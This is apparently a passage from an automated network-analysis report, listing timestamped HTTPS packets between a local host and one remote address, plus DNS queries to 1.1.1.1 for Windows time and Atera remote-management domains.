                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:11.177333117 CET4435001513.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:11.177405119 CET50015443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:11.177427053 CET50015443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:12.664274931 CET4435002213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:12.665672064 CET50022443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:12.665697098 CET4435002213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.185019970 CET4435002213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.289793968 CET50022443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.289865017 CET4435002213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.291194916 CET50022443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.291409969 CET4435002213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.291476965 CET50022443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.292992115 CET50031443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.293032885 CET4435003113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.293134928 CET50031443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.293843031 CET50031443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.293854952 CET4435003113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.494764090 CET4435002313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.494843006 CET50023443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.496898890 CET50023443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.496912003 CET4435002313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.497184038 CET4435002313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.498367071 CET50023443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.539334059 CET4435002313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:14.022638083 CET4435002313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:14.022720098 CET4435002313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:14.022766113 CET50023443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:14.023473024 CET50023443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:14.024705887 CET50034443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:14.024751902 CET4435003413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:14.024861097 CET50034443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:14.025419950 CET50034443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:14.025439978 CET4435003413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:15.730573893 CET4435003113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:15.730658054 CET50031443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:15.732467890 CET50031443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:15.732475996 CET4435003113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:15.732748032 CET4435003113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:15.733798027 CET50031443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:15.775368929 CET4435003113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:16.208225012 CET4435003413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:16.209592104 CET50034443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:16.209623098 CET4435003413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:16.305217981 CET4435003113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:16.305301905 CET4435003113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:16.305387020 CET50031443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:16.306026936 CET50031443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:16.307099104 CET50041443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:16.307140112 CET4435004113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:16.307275057 CET50041443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:16.307677984 CET50041443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:16.307691097 CET4435004113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:16.730674028 CET4435003413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:16.730741978 CET4435003413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:16.730910063 CET50034443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:16.732266903 CET50044443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:16.732275963 CET50034443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:16.732310057 CET4435004413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:16.733133078 CET50044443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:16.733463049 CET50044443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:16.733479023 CET4435004413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:18.709574938 CET4435004113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:18.712701082 CET50041443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:18.712723017 CET4435004113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:19.117399931 CET4435004413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:19.144263983 CET50044443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:19.144287109 CET4435004413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:19.247407913 CET4435004113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:19.247432947 CET4435004113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:19.247500896 CET4435004113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:19.247539043 CET50041443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:19.250540018 CET50041443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:19.258702993 CET50041443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:19.273931980 CET50053443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:19.273971081 CET4435005313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:19.274044991 CET50053443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:19.277981043 CET50053443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:19.277998924 CET4435005313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:19.668543100 CET4435004413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:19.668626070 CET4435004413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:19.668670893 CET50044443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:19.669425964 CET50044443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:19.676281929 CET50057443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:19.676337957 CET4435005713.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:19.676414967 CET50057443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:19.676647902 CET50057443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:19.676662922 CET4435005713.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:21.725627899 CET4435005313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:21.728166103 CET50053443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:21.728234053 CET4435005313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:22.052865982 CET4435005713.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:22.108571053 CET50057443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:22.108589888 CET4435005713.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:22.259521961 CET4435005313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:22.259598970 CET4435005313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:22.259655952 CET50053443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:22.261163950 CET50053443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:22.263408899 CET50061443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:22.263456106 CET4435006113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:22.263576984 CET50061443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:22.264220953 CET50061443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:22.264235020 CET4435006113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:22.632142067 CET4435005713.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:22.632225990 CET4435005713.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:22.632339954 CET50057443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:22.632909060 CET50057443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:22.634742975 CET50063443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:22.634778023 CET4435006313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:22.634921074 CET50063443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:22.635142088 CET50063443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:22.635160923 CET4435006313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:23.353820086 CET50063443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:23.358679056 CET50066443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:23.358731985 CET4435006613.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:23.358805895 CET50066443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:23.359234095 CET50066443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:23.359249115 CET4435006613.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:23.399329901 CET4435006313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:24.573313951 CET4435006113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:24.575508118 CET50061443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:24.575525045 CET4435006113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.074698925 CET4435006313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.074826956 CET50063443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.096863985 CET4435006113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.096884012 CET4435006113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.096946001 CET4435006113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.096966982 CET50061443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.097062111 CET50061443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.097898960 CET50061443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.098772049 CET50069443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.098817110 CET4435006913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.098934889 CET50069443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.100207090 CET50069443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.100223064 CET4435006913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.764676094 CET4435006613.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.764750004 CET50066443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.769236088 CET50066443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.769253016 CET4435006613.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.769543886 CET4435006613.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.771279097 CET50066443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.815324068 CET4435006613.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.975967884 CET50069443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.978353024 CET50073443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.978390932 CET4435007313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.978514910 CET50073443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.978791952 CET50073443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:25.978811026 CET4435007313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:26.023327112 CET4435006913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:26.300077915 CET4435006613.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:26.300678015 CET50066443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:26.300705910 CET4435006613.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:26.300780058 CET50066443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:26.978715897 CET50078443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:26.978787899 CET4435007813.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:26.979387045 CET50078443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:26.979763985 CET50078443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:26.979793072 CET4435007813.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:27.477854013 CET4435006913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:27.477971077 CET50069443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:27.477971077 CET50069443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:28.352984905 CET4435007313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:28.353095055 CET50073443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:29.450290918 CET4435007813.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:29.450387001 CET50078443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:29.673126936 CET50073443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:29.673146009 CET4435007313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:29.673290968 CET50078443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:29.673321009 CET4435007813.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:29.673480988 CET4435007313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:29.673703909 CET4435007813.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:29.675154924 CET50078443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:29.675457954 CET50073443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:29.715373993 CET4435007813.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:29.719366074 CET4435007313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.195867062 CET4435007313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.195954084 CET4435007313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.196013927 CET50073443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.196604013 CET50073443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.206985950 CET4435007813.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.207070112 CET4435007813.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.207128048 CET50078443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.207619905 CET50078443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.207879066 CET50081443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.207904100 CET4435008113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.207971096 CET50081443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.208156109 CET50081443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.208168030 CET4435008113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:32.535362005 CET4435008113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:32.542078018 CET50081443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:32.542089939 CET4435008113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:32.708947897 CET50083443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:32.708985090 CET4435008313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:32.713313103 CET50083443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:32.717503071 CET50083443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:32.717516899 CET4435008313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:33.056746960 CET4435008113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:33.056830883 CET4435008113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:33.058880091 CET50081443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:33.062743902 CET50081443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:35.037130117 CET4435008313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:35.040505886 CET50083443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:35.040523052 CET4435008313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:35.554333925 CET4435008313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:35.554419041 CET4435008313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:35.554505110 CET50083443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:35.555835009 CET50083443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:35.556402922 CET50087443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:35.556432009 CET4435008713.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:35.556518078 CET50087443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:35.556787014 CET50087443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:35.556808949 CET4435008713.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:37.950215101 CET4435008713.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:37.952153921 CET50087443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:37.952171087 CET4435008713.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.475603104 CET4435008713.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.475672007 CET4435008713.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.475713968 CET50087443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.476286888 CET50087443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.477744102 CET50089443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.477842093 CET4435008913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.477921963 CET50089443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.478416920 CET50090443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.478460073 CET4435009013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.478538036 CET50090443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.478759050 CET50089443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.478773117 CET4435008913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.478960037 CET50090443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.478976011 CET4435009013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:40.792424917 CET4435009013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:40.836858988 CET50090443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:40.921768904 CET4435008913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:40.961877108 CET50089443192.168.2.713.232.67.198

                                                                                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:15.334073067 CET6040653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:25.999886990 CET5422353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:37.968709946 CET5788453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:41.292779922 CET5767953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:41.325311899 CET6328153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:41.430591106 CET53576791.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:47.969455004 CET5032353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:48.497072935 CET53503231.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:52.852791071 CET6368953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:40.946964025 CET5852953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:48.962270975 CET6316453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:58.390908003 CET5394453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:07.898215055 CET5731853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:17.856092930 CET5001353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:20.404082060 CET5249553192.168.2.71.1.1.1

                                                                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:15.334073067 CET192.168.2.71.1.1.10xfeaeStandard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:25.999886990 CET192.168.2.71.1.1.10x1b95Standard query (0)agent-api.atera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:37.968709946 CET192.168.2.71.1.1.10xb807Standard query (0)agent-api.atera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:41.292779922 CET192.168.2.71.1.1.10x59b2Standard query (0)ps.pndsn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:41.325311899 CET192.168.2.71.1.1.10x9ac1Standard query (0)agent-api.atera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:47.969455004 CET192.168.2.71.1.1.10xb8b8Standard query (0)ps.atera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:52.852791071 CET192.168.2.71.1.1.10xa7d8Standard query (0)agent-api.atera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:40.946964025 CET192.168.2.71.1.1.10x3881Standard query (0)agent-api.atera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:48.962270975 CET192.168.2.71.1.1.10x4871Standard query (0)agent-api.atera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:58.390908003 CET192.168.2.71.1.1.10x3c20Standard query (0)agent-api.atera.comA (IP address)IN (0x0001)false
